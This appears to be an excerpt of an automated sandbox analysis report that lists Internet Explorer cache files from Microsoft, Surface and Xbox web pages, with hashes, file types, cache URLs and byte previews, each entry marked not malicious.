                                                                                                                                                                                                              SHA-512:5AA9BEE1DAB523D3461BBDC9BDA38EFEBFBBA9309F7A0C866B4B9448F0FEA2B95D106CF9DE084651FB14E0469E6620BE4E250706D12891C08745E7A8ABDBF3A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSStyles/style.csx?k=695a9e8a-8345-bf6f-2a3a-57e305dbe8f1_18686a99-0102-6c3c-3395-05d092772ffa_d31d3dbe-606e-a4d9-2b07-bdd563d0a288_19ffbf88-7cda-63b5-3d39-661c12ca2e7b_61cbfab0-df57-d88c-0d7f-3a6cc8025802_de27edd8-7afb-41eb-1b6d-0d087c90f98f_83398ac8-1b1e-304e-969d-f792c4ff56b8
                                                                                                                                                                                                              Preview: /*for sentence case*/....body[class*="en-"] #mainContent.wdg-global a.c-call-to-action span,.body[class*="en-"] #mainContent.wdg-global.surfacecom a.c-call-to-action,.body[class*="en-"] #mainContent.wdg-global a.c-hyperlink:not(.supBlink),.body[class*="en-"] #mainContent.wdg-global a.c-hyperlink:not(.supLink),.body[class*="en-"] #mainContent.wdg-global a.c-hyperlink.f-image span,.body[class*="en-"] #mainContent.wdg-global .design-18 button.c-button,.body[class*="en-"] #mainContent.wdg-global .compare-design-en-us #filtercompareButton,.body[class*="en-"] #mainContent.wdg-global .compare-design-en-us .sticky-compare-content #compareButton./*body[class*="en-"] #mainContent.wdg-global .hmc-results .mobile_wrapper .swatch-color .surface-swatch-color-name*/./*body[class*="en-"] #mainContent.wdg-global .design-18 .results .m-content-placement [class*='device-'].m-content-placement-item .swatch-color .surface-swatch-color-name*/./*#mainContent.wdg-global .design-18 button.c-button:not(.back)*/
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\surface.64x64[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):1063
                                                                                                                                                                                                              Entropy (8bit):7.729251694583134
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:LQFeqKNJ3fInvL1MGcV3vMLmxqFQimAMNiMXo8u:LUeq+JwvfOUaqqiU8F
                                                                                                                                                                                                              MD5:BA7E7D442BC282F0A9E69D484C639962
                                                                                                                                                                                                              SHA1:68037EC75A4E7B8793C5059993A35BFB76D13804
                                                                                                                                                                                                              SHA-256:FD52D354DD29F09284BDEC4D1F52ABCF51DD06B77571D8E8F1E852EF8E20DEFF
                                                                                                                                                                                                              SHA-512:2F3D583108B5DDA977C4FDA868222B8CAE4709D0E2896392FC83980929807AE32BABEE15C358D3D4A71E5293FA261E99087E7BFE2705DFECEC1FFF0AFBDD7D9E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://support.microsoft.com/socimages/appicons/surface.64x64.png
                                                                                                                                                                                                              Preview: .PNG........IHDR...@...@......iq.....sRGB.........gAMA......a.....IDATx^.]R.1..@Y......z.....d...MO.7P.,..o...O..@.O .Y.L.Nz...$.[3.._U..CH....&.2.L&..d2.L....]...#e...[...d.*0*.......lgr.?2.V.....XYI..,FL.{..|(...\....lg.E.A;.p.n...Tw.F..Q.|...&. ]...1[.......l.....g .....J..)........1..C.KU......".*^......OZ.`./...LT....}.V..i...qQ}..".l._..K......|........G..p..U..SU.u.+...a8..U4.?....C......e.'dM.@_.H.@..T........&..[..Djd........=`GhI..q.~..W.s.|F5..H.. ..6....xwJ..5......x.I..f....x...._..L..f...ZC......>...`.....s..Gbk..^i.vF(.9.>1R....R...+.4E..Z-T.P...<Qa....v.?.......#.H....vBS...d....~.|...U...K.v.. ..f.>U.&5.q.'..`7..._.z2...".l....6.......4.......M.h.....g!.E.......Q...,...v....p...7R...r=...G%..8p...LQ..MS...>`n....)y~Pi...B.j....\\.w. .....e.!..W...W!..N......2.....)l.../.<.!aJ...).."..x(b..88?..6.X..!t.... .x...S.I.y.v.....}{..Eo...J.5@.l..D..n...z..O.<.4......|.l|...,.....0...|...0..v.#*.....X0Z._.H;..."..w.n...-X..mP/Z
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\surface[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):146854
                                                                                                                                                                                                              Entropy (8bit):5.285815161996233
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:lAtNPeKojRoagThcUH9WnM/eU0ql3Us46ws:lacKojRoagTOUH0M/q9s46z
                                                                                                                                                                                                              MD5:C989A027F1CCA5F4B24C11290DFD386F
                                                                                                                                                                                                              SHA1:EA866476552165C63F5533EFF879F325797D2435
                                                                                                                                                                                                              SHA-256:6D28E7B5C6DB212EE9B3C4A7973C54C7D8EDA92258F855BDDF367954A9B47E0E
                                                                                                                                                                                                              SHA-512:142FDD9A45B3B1D1E4196D678CE8C1253AFA46CB8FBAEB7F0DA713AC199E17D2639CC805D479DD3491191587D9C3899A144B80D4EB5470369092F2FFF16AA4BD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .<!DOCTYPE html ><html xmlns:mscom="http://schemas.microsoft.com/CMSvNext" xmlns:md="http://schemas.microsoft.com/mscom-data" class="grunticon skrollr skrollr-desktop" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head> <meta content="width=device-width, initial-scale=1.0" name="viewport" />--> <mscom:conditional propertyexists="true" instancename="isCookieConsentRequired" customexpression="True::False">--> <script type="text/javascript" src="//www.microsoft.com/library/svy/min/pre_broker.js" async="true"></script>...<script type="text/javascript" src="//www.microsoft.com/library/svy/min/broker.js" async="true"></script>--> </mscom:conditional>--><meta charset="utf-8" /><meta content="IE=edge,chrome=1" http-equiv="X-UA-Compatible" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0" /><meta name="consentRequired" content="True" /><link rel="shortcut icon" href="//www.microsoft.com/favicon.ico?v2" /><link rel="canonical" href="htt
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\t[1].gif
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                              Entropy (8bit):3.16293190511019
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:CUmExltxlHh/:Jb/
                                                                                                                                                                                                              MD5:FC94FB0C3ED8A8F909DBC7630A0987FF
                                                                                                                                                                                                              SHA1:56D45F8A17F5078A20AF9962C992CA4678450765
                                                                                                                                                                                                              SHA-256:2DFE28CBDB83F01C940DE6A88AB86200154FD772D568035AC568664E52068363
                                                                                                                                                                                                              SHA-512:C87BF81FD70CF6434CA3A6C05AD6E9BD3F1D96F77DDDAD8D45EE043B126B2CB07A5CF23B4137B9D8462CD8A9ADF2B463AB6DE2B38C93DB72D2D511CA60E3B57E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\table[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):450660
                                                                                                                                                                                                              Entropy (8bit):5.022044121378892
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:DAwmeEZACGIzyP5kTP3bI0tfYqQ0xtLfj4ZDa813giY8R1j35Ap7zzN1n1JKfNkS:jEZACowse+7PfD
                                                                                                                                                                                                              MD5:45EFD836736E5888AE26271790AB1487
                                                                                                                                                                                                              SHA1:C8969BFF53B72EA1D09F05FA990B5F29F4BED234
                                                                                                                                                                                                              SHA-256:387811CB3CE465A2330ACBD1C756425B491484DA1D59159A01F7935F6B7EDEA7
                                                                                                                                                                                                              SHA-512:30140385C2A08D8CD1DB88830E2633D8D76D9BDA1AFD68C2870AC3E1254BFD6120E32EB3E881D15473542DB3D7B349813CAB1759713F7BB58B822B68FC791072
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/css/MWF_20210208_31270267/west-european/default/actiontoggle/alert/areaheading/autosuggest/button/calltoaction/combo/contentplacement/contentrichblock/dialog/divider/drawer/glyph/heading/image/linknavigation/list/multislidecarousel/pagebehaviors/progress/rating/select/selectmenu/skiptomain/slider/social/sticky/table?apiVersion=1.0&include_base=true
                                                                                                                                                                                                              Preview: @charset "UTF-8";./*! 1.58.2 | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.html{font-family:sa
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\table[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):125942
                                                                                                                                                                                                              Entropy (8bit):5.142949996566773
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:+c49kADAKCV8UHyvpoKqqgLLMv2OOwDNEUR9qVaMNk+Q4EMQgKgaeX81f1FOrbFD:ayyvpoZCF/XhtzK
                                                                                                                                                                                                              MD5:4CA0B7EC3583D84AF6B1320B69FA0018
                                                                                                                                                                                                              SHA1:D72D19AC3A578B5D304EC9CEDBF90DFD16C53C73
                                                                                                                                                                                                              SHA-256:BD6A15F0A8F2D1BE4C5BBA3779461D402072F273F91879778F7396ECE75B1130
                                                                                                                                                                                                              SHA-512:B7E810B635E4F92832EB57D54BED0BFAADA4BB00F3615F7DF72F9709E1547DE1BFAB56E62704647000D70AEAF2F30FBE95F2823C61F44A133197C08BDAF853BA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/mwf/js/MWF_20210208_31270267/actiontoggle/areaheading/button/calltoaction/combo/contentplacement/contentrichblock/dialog/divider/drawer/glyph/heading/linknavigation/list/multislidecarousel/rating/slider/sticky/table?apiVersion=1.0
                                                                                                                                                                                                              Preview: require(["tooltip","componentFactory"],function(n,t){t.ComponentFactory&&t.ComponentFactory.create&&t.ComponentFactory.create([{component:n.Tooltip}])});define("observableComponent",["require","exports","htmlExtensions"],function(n,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var r=function(){function n(t,i){i===void 0&&(i=null);this.element=t;this.ignoreNextDOMChange=!1;this.observing=!1;n.shouldInitializeAsClass(t,i)&&this.setObserver()}return n.prototype.detach=function(){this.unObserve();this.teardown()},n.prototype.isObserving=function(){return this.observing},n.prototype.unObserve=function(){this.observing=!1;this.modernObserver&&this.modernObserver.disconnect();i.removeEvent(this.element,i.eventTypes.DOMNodeInserted,this.obsoleteNodeInsertedEventHander);i.removeEvent(this.element,i.eventTypes.DOMNodeRemoved,this.obsoleteNodeRemovedEventHandler)},n.prototype.setObserver=function(){this.observing=!0;typeof n.mutationObserver!="undefined"?this.observeModern():
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\urlblockindex[1].bin
                                                                                                                                                                                                              Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                              Entropy (8bit):1.6216407621868583
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:PF/l:
                                                                                                                                                                                                              MD5:FA518E3DFAE8CA3A0E495460FD60C791
                                                                                                                                                                                                              SHA1:E4F30E49120657D37267C0162FD4A08934800C69
                                                                                                                                                                                                              SHA-256:775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
                                                                                                                                                                                                              SHA-512:D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblockindex.bin
                                                                                                                                                                                                              Preview: .p.J2...........
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vxpiframe[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):18332
                                                                                                                                                                                                              Entropy (8bit):5.162171841483405
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:LC/xEBsuUses94/ZxIOAbIisn3C+qxvVqkllsYuYrSGKzVm50Z19jTYdGdEdydsw:+ruTG5b2lsHhGKzV519OE64sw
                                                                                                                                                                                                              MD5:7101B5156B2BDF4E5869078A6F15E606
                                                                                                                                                                                                              SHA1:75417AC2CB7F89E00047370D0ECA027CADA41040
                                                                                                                                                                                                              SHA-256:3A9548EB083D31A4DDACA69535CE9472C7D187ACF105C1ED773F04A2F7CD0636
                                                                                                                                                                                                              SHA-512:9B4D047F992D570478136CE533FD03E1333C369963B1B2B426FAB8745B3837ACC55AA84B1BB0BD38C36373BC469B18FA2137EF5F0C924BB358EA74CF8B20EE3A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/videoplayer/js/vxpiframe.js
                                                                                                                                                                                                              Preview: var MsOnePlayer;(function(n){function i(n,i,r){var u=new t(document.getElementById(n),i);u.onPlayerReady(r)}n.render=i;var t=function(){function n(t,i){var r=this,u;(this.playerDiv=t,this.playerData=i,this.playerReady=!1,this.onPlayerReadyCallbacks=[],this.playerEventListeners=[],this.onMessageReceived=function(t){if(t&&t.data&&t.origin===n.iframeOrigin)try{var i=JSON.parse(t.data);if(!i||i.playerId!==r.playerId)return;i.data&&(r.playPosition=i.data);switch(i.eventName.toLowerCase()){case"playerready":r.playerReady=!0;setTimeout(function(){var n=r.iframeElement.contentDocument.getElementById("primaryArea");n&&n.removeAttribute("role")},1e3);r.doCallback(r.onPlayerReadyCallbacks,r);break;case"postjsllmessage":r.sendTelemetyData(i.data)}r.doCallback(r.playerEventListeners,{name:i.eventName})}catch(u){}},t&&i&&i.metadata&&i.metadata.videoId)&&(n.iframeOrigin[0]==="%"&&(n.iframeOrigin=n.iframeOriginDefault),n.siteName[0]==="%"&&(n.siteName=n.defaultSiteName),this.playerReady=!1,n.playerCou
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\wdg-global.min[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):20410
                                                                                                                                                                                                              Entropy (8bit):5.028639674114126
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:ZnXZMAgrv/M8juDOanD/4gPIRS+Sw0SMlrjK:JXArvk8juDONgPIRS+Sw0rlC
                                                                                                                                                                                                              MD5:BF0A69D8CAD18AA488A5751648F135A2
                                                                                                                                                                                                              SHA1:DEE088DC6409B997C0E661916B7428AF34B8B770
                                                                                                                                                                                                              SHA-256:9B354642D5DCD07E9D4FA97707581F5B7C0B8CF41253CAD4410CCB4C93E74C9A
                                                                                                                                                                                                              SHA-512:8019DADD7CDA335425AD5F2B5B1B0A892AB14ADF7AA56C18A22966BF0F484A989559A63BC51AFF31E48CB895F367210D3713E03D802626183609074E1A5CC0EC
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RWbRcX
                                                                                                                                                                                                              Preview: .wdg-f-cursor-default{cursor:default !important}.c-content-placement.wdg-f-cursor-default:hover picture img,.m-content-placement-item.wdg-f-cursor-default:hover picture img{opacity:1}.wdg-pad-24{padding-top:24px}.wdg-pad-48,.wdg-pad-thin{padding-top:48px}.wdg-pad-64{padding-top:64px}.wdg-pad-84,.wdg-pad-medium{padding-top:84px}.wdg-pad-100{padding-top:100px}.wdg-pad-120,.wdg-pad-large{padding-top:120px}.wdg-pad-140{padding-top:140px}.wdg-pad-160,.wdg-pad-x-large{padding-top:160px}.wdg-pad-zero{padding-top:0}@media only screen and (max-width:1083px){.wdg-pad-24{padding-top:18px}.wdg-pad-48,.wdg-pad-thin{padding-top:36px}.wdg-pad-64{padding-top:48px}.wdg-pad-84,.wdg-pad-medium{padding-top:64px}.wdg-pad-100{padding-top:84px}.wdg-pad-120,.wdg-pad-large{padding-top:100px}.wdg-pad-140{padding-top:120px}.wdg-pad-160,.wdg-pad-x-large{padding-top:130px}}@media only screen and (max-width:539px){.wdg-pad-24{padding-top:12px}.wdg-pad-48,.wdg-pad-thin{padding-top:24px}.wdg-pad-64{padding-top:36px}.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xbox-MWF[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):62137
                                                                                                                                                                                                              Entropy (8bit):4.874353635101313
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ZWnZuKqM2dbCrd2CrO5nR+H+duTezs5Fb+PvUE0ROpS/S7Fbxj/u:ZWnZuKqM9cQGs5Fv
                                                                                                                                                                                                              MD5:661001CB2650DC9831C4967D98B8BBE8
                                                                                                                                                                                                              SHA1:B4BA5226B135041CCB3228661760BFEEFF4C2352
                                                                                                                                                                                                              SHA-256:78630DF8ABF8DD2C0E34E6EC55F666D4D92452E7986FB4AE24BBBCB6D82DBDA9
                                                                                                                                                                                                              SHA-512:3C13EC87DC503912540F1992FEA56BA110DED45910C71588D8D27F33E2ADFCC58F74FA32ED1694F7E58C31C88FFEE68D1CEA33C33DC1B83F1CCCCD009A47F984
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/en-US/global-resources/templates/MWF/CSS/xbox-MWF.css
                                                                                                                                                                                                              Preview: /* make these references full URL paths before publishing */..@import url("https://www.xbox.com/en-US/global-resources/templates/MWF/CSS/Snow-Bird-Custom-modules.css"); .@import url("https://www.xbox.com/en-US/global-resources/fonts/SegoePro-Black.css");.@import url("https://www.xbox.com/en-US/global-resources/fonts/MWFMDL2-Xbox.css");.@import url("https://www.xbox.com/en-US/global-resources/templates/MWF/CSS/sno-byrd.css");....SegoeProBlack {. font-family: 'SegoeProBlack';.}...MWFMDL2-Xbox {. font-family: 'MWFMDL2-Xbox';.}...theme-dark .c-mosaic-placement picture::after, .theme-light .theme-dark .c-mosaic-placement picture::after {. background: none;.}...clear {. display: none;.}../* CSS fix for sup/sub */.sup, sub {. font-size: 75%;.}...m-content-placement-item .c-hyperlink {. padding: 0 0;.}../* UHF overrides */...c-uhf-menu button:after {padding-top: 5px;}.div[data-module-id] {.min-height: 0px;.}...c-uhff {. margin-top: 0px;.}..c-uhfh-actions a.c-call-to-action
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1399_Panel05_PriorityFeature_GetThingsDone[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 818x460, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):52917
                                                                                                                                                                                                              Entropy (8bit):7.930126736245285
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:sBdgjF8gSAmKWMRRP/GhBmr48JSnqNjJXX2kOX3nLtXlbS2nCtlO:srgjF8g2KWaV/CBusnMJ2p7tXw2C2
                                                                                                                                                                                                              MD5:B199FF89CE797970C3D150831710E358
                                                                                                                                                                                                              SHA1:BE104281D7372D609E29891B448CEDB7FA9FCC26
                                                                                                                                                                                                              SHA-256:7A9B10236246665E194364790B9197C2333E3B418591F0436B289D203167FB88
                                                                                                                                                                                                              SHA-512:5F8506DC9A395D4C6BACAD406BA0BD007384019E52188991AA8AC6F7D41D26AB1659903074913657FB97FEFBFC2396C3053AC702A9E1C4B18618046FC5B2B4F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel05_PriorityFeature_GetThingsDone.jpg?version=7348ef6d-2785-545b-6d8d-65dc0c7b43e8
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................2....................................................,i...wV..E........$.L....LLDL.L...R...]..0...v...m.........333.1.11...13..T...+...2...U[...........sN.)R.fbfb&&&&"f&.L..(C...:.uUn..:tS.....Ff^NNG=pppah.J.S3.13.11.3.133*T..7..I...S.,*.....o..\\|Q.|Q.....T....LLDL.L.L.."@...AM.N..QL......D...Dqaa.T......DLL.L.L..HLA}....[.wT.......8.Q0.."1..*ffbfbbb&&&b&fffR.!...E..UUUT......5].?.&&!D...a..S33.......3.0.T.R...6{,..l*..;n.ht...pw.(......>..J...111...1.0.B.9.}..gb'..e2...,.)....?L......S3.3.......>u...Vv.e.....#.YJ..v..c`........."&"&"xZ.Q33..<s.Y.....z.E....e......CV7Wt.N.....<>.....<q.33...333.0t.4.3.'.v..V._..*BI$..}1..U......W....'.W.|.Q....p.^.h:.$..Ly&..=;a.kM.]k..^.....w....!$.$!....WN....@.{.VC....;.....<q....Q.."...-/Y.LI...?..?,y...?.........1._..............e.L.o[...myo.9u....>...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1399_Panel06_PriorityFeature_Security[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 818x460, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):71571
                                                                                                                                                                                                              Entropy (8bit):7.970117802410354
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:W+obKxjbFsh0rj6WyXrBc2EMvhwADQIR+a+zRBwodcKi6Caz34ZwOoBBmFng:W+E2s+d6BxEMvhfQIb8RGjnaUhg
                                                                                                                                                                                                              MD5:24C48AF1FF5718C2D6B4D4D3FCA7D001
                                                                                                                                                                                                              SHA1:729E61E3E48B8C0B7E6B62CD3B457CD335840769
                                                                                                                                                                                                              SHA-256:C9744188D2A85C7170BE83C03E1AAF84F45D825DBDCF80E52CAC7867F9A0C50F
                                                                                                                                                                                                              SHA-512:10C1B7F71B942BC378207C20B4C08164F2479FEE9A523B47C689A0F526BA4FF80316870BA19C7B16CFA3DDB677E01B11BE31B565642E221C0BA2DAF6F226A3FE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel06_PriorityFeature_Security.jpg?version=088968fa-3e15-75d5-dacc-b30b8d16a93d
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................2..........................................................@.......G...KAB.+.kz.,m..N...y.Q"y..&>.f...(.......,m&#$)IiiiF...+X...ST.Z.Z.D<.acaG.5....s..........q.'MFhT......immJ.....Nz.....+M.|.N......kXF.....X.....!o..4!R......}KW.-.).jS.U.Z...n.L.....V...{y.[.J.....o......[.4...J....0....j..(O=Z..7...B...V.JUhQMN....T..Y.d.....y.........M$..K,f..m.2....q..c..T.z.nor.\..P..:..=..D.....s:.Ik...5.....b.T.4....^Z.5....jc..jT.i.T..._.@Ys.7..R.,.,.....O.\.).t...{.....C..K.rQ...+z2F{.U'...P...V.I...^.....gj...R..;.&.......r..9.nv......K..S.J.iIJ{[.F.y...R.Q.Z.I.f.@-...q..H....0..m......U.m.h_Cg.MP...7.B..R.-(...w7....S.M^.i.M4.%..-......i..VV.5.[_.....n...??.}.........l.J0.R...){.YR..k.Zz.O1.U.m...o..67x...$..2.s.Ju..%V.c........)..Kj.]/...4..\U.=Z..c.....\.V.5.$..\lX..R.........V.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1399_Panel07_PriorityFeature_GamePass[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 818x460, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):118310
                                                                                                                                                                                                              Entropy (8bit):7.985474306834757
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:hokE6gaaZKHxPtXSpweVEHjQ2w2EkgvbExcM31Sa+:4tZKH+qeVEHj62EkcRz
                                                                                                                                                                                                              MD5:8E752F264BD54A5E75A67C3B008762B5
                                                                                                                                                                                                              SHA1:30E52C5EB20E2DB2D8A562E312C71D7D4AD25237
                                                                                                                                                                                                              SHA-256:252A310B31C9830E7D0CAD0C427529EAAF8AE1E86CF754D63DE26F68400E2770
                                                                                                                                                                                                              SHA-512:C81E4B7BE87CD9E3D2F34F1D6E5987FF62D5F29FBFE46E9A77B370D9DC6D85B7517CAAE19274949340720360E0513041209CD9CB9B40F55A68EBEABA802FD17E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/1399_Panel07_PriorityFeature_GamePass.jpg?version=35283866-3af2-b7fe-d1f9-0d29cb82a6c4
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................2.....................................................Q;..a..aa....#.8...P..a.G..`...2fd,... ...qE..3....r.1.He.*wwI.DA..D.#......3.F....`...2ffd,."....QE.F"...RHR.r....+.t........`1.q.".fa..8.8.1.d.3330......0..q.2I..9$2.I$....&f.a.a......Y:HXD.8......2fff.a...".(a..c....G)$..9..W't..."(DE..@E...fa......fd....",!.G.1C..A.1...NDfr.R...3..I..XXX.....rrI0....".........@#....^....(..]...Y%yL..I$.aaB.E..$DFD.3.....0..&L.0...G...U.Z.z...F.....r....N.0.f.aL..)..QA^.z..W.^.x.....(. .. ....8......W....l..Y..%.bt..$.f.ft^I...3.^....\..b.qO$.%....C...!.!.,..0.M.9...5.!.L.Fr..o.bN...N.f.gr/..;.^.|.Z2JOkBIt.U.H]...g.yO...%*...F.3&LR~F..R....9......$.;..N............S.Z.J[...".;8..................]..!~.X....EHe#._J.$.''I.3"s._.....%S...d..E........W+....q.*.}5x.+.;.......fP....b".....ffI...2d.g4.#.......Y..M].....r
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\1399_Panel15_Mosaic_Item1_Gray[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:[TIFF image data, little-endian, direntries=0], baseline, precision 8, 700x400, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):12575
                                                                                                                                                                                                              Entropy (8bit):7.410992223650192
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:wDlqJicRs7DiBO5pGLDwQPVFgNFP278qQR0HD6CYsG2Oq9NX8ueMbnvpLgGH8cpW:wDl2BRofrGz8P1xR0joqXPDpMGTpyvz
                                                                                                                                                                                                              MD5:84ED85253A5014FAE21858F414F7A258
                                                                                                                                                                                                              SHA1:E7C94105225016C47BC98969598C77DFC625C4C4
                                                                                                                                                                                                              SHA-256:35B50BB146CD9140F42E3DB4062F6F5ED80543889183D8B7E08136D8B5B7FB17
